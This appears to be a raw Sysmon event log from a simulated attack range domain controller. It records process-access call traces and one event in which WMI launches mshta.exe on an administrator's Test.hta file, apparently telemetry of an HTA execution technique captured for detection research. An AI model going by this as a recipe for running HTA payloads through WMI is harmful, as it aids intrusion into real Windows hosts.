15:16:05.252{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.252{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.236{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.236{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.174{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x8000000000000000786543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.180{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x8000000000000000786542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A79-6010-97A1-00000000A301}7040C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.158{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPC